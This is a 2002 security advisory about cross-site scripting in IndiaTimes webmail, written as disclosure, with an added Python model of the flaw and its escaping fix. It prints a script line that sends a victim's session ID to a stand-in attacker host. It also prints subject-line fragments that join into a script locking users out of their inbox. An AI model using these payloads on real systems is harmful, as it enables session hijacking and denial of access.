[NEWS] IndiaTimes.com - Email - Session hijacking and Inbox Blocking

From: support@securiteam.com
To: list@securiteam.com
Date: Mon, 29 Apr 2002 09:07:39 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  IndiaTimes.com - Email - Session hijacking and Inbox Blocking
------------------------------------------------------------------------

SUMMARY

Email.indiatimes.com is a very popular web-mail service provided by
http://www.indiatimes.com, the online version of the newspaper 'The Times
of India'. The script used by the web site allows users to embed HTML and
JavaScript in emails, which makes it possible to insert malicious code
into a mail. Although the script does not use cookies, it is still
possible to hijack a user's session by sending him an email (even if he
does not read the email).

DETAILS

Let us present the whole discussion in dialogue form:

Q: How are sessions hijacked? The site does not use cookies.
A: The site does not use cookies, but the session ID/key is contained in a
hidden form field:

<Form name=Rform ...>
 <input type=hidden name=SID value="some_random_number">
</form>

This SID is the only token required to authenticate the user. Therefore an
attacker may pass it to a script installed on some server, from where he
can misuse it.

Example:
<script>
self.location.href="http://evilserver.com/evil.cgi?SID="+Rform.SID.value
</script>

Q: The user may choose not to read the attacker's mail. What can we do now?
A: After clicking 'inbox', the whole list of mails appears, showing the
subject and sender's address of each mail. A <SCRIPT> embedded by the
sender in the 'Subject' is executed as soon as the user tries to open the
inbox. This makes the user even more vulnerable to attack.

Q: Only 30 characters of a 'Subject' are displayed. So, if one tries to
insert a script in the 'Subject', he can only write 13 characters of code
(30 - strlen('<SCRIPT></SCRIPT>')). Is it impossible to exploit the above
vulnerability with only 13 characters of code?

A: It is possible. Let us show you.
One may fragment the code into smaller parts and send the fragments in the
subjects of separate mails, one after another, in the following order:

*/</script>
*/history.go(-1)/*
<script>/*

This will not allow the user to open his inbox. Now, see the beauty of
comments and the reverse order of lines. Since the most recent message is
on top, the inbox lists the three subjects in reverse order, and the block
comments join the fragments into one script by commenting out the HTML
that the page places between them.
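The listing behaviour described above, as an added example that is not part of the original advisory: a small Python model of the inbox page showing why a per-subject check for a `<script>` pair misses the fragments, and that HTML-escaping every subject before it is written into the page (the control the webmail script lacks) neutralises them. The fragments, the row markup and the function names are constructed assumptions; the real page markup is not known.

```python
import html
import re

# Constructed sample subjects in the order the sender sends them (not real mail
# data). Each fragment fits in the 13 characters the advisory has left after the
# <script></script> wrapper, and the /* */ comments glue them together once the
# inbox shows the newest message first.
SENT_SUBJECTS = [
    "*/</script>",
    "*/history.go(-1)/*",
    "<script>/*",
]

# A naive blocklist of the kind a webmail filter might apply to each subject.
SCRIPT_PAIR = re.compile(r"<script>.*</script>", re.IGNORECASE | re.DOTALL)


def naive_subject_check(subject: str) -> bool:
    """Return True if one subject on its own holds a complete <script>...</script>."""
    return bool(SCRIPT_PAIR.search(subject))


def render_inbox(subjects_sent_order, escape_output: bool) -> str:
    """Model the inbox listing: newest mail first, one table row per subject.

    escape_output=False inlines subjects verbatim (the vulnerable behaviour);
    escape_output=True HTML-escapes every subject (the fix). The row markup is
    an assumption, not the real page.
    """
    rows = []
    for subject in reversed(subjects_sent_order):
        shown = html.escape(subject, quote=True) if escape_output else subject
        rows.append("<tr><td>" + shown + "</td></tr>")
    return "<table>" + "".join(rows) + "</table>"


def listing_has_script(listing: str) -> bool:
    """True if the rendered page, taken as a whole, contains a script element."""
    return bool(SCRIPT_PAIR.search(listing))


if __name__ == "__main__":
    print("per-subject check flags:", [naive_subject_check(s) for s in SENT_SUBJECTS])
    print("unescaped page has script:", listing_has_script(render_inbox(SENT_SUBJECTS, False)))
    print("escaped page has script:", listing_has_script(render_inbox(SENT_SUBJECTS, True)))
```

The per-subject check passes all three fragments, while the assembled unescaped page contains a complete script element; escaping on output removes it regardless of how the input was split.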

Q: The user may disable JavaScript in the browser's settings.
A: The site requires JavaScript for its functionality, therefore the user
cannot disable JavaScript and continue using the site.

Impact:
Because of the high number of users of Email.indiatimes.com, this
vulnerability poses a great risk.

Vendor status:
The vendor was notified but there was no response so far.

ADDITIONAL INFORMATION

The information has been provided by Giri Sandeep
<sggosuch@isc.iitr.ernet.in>.
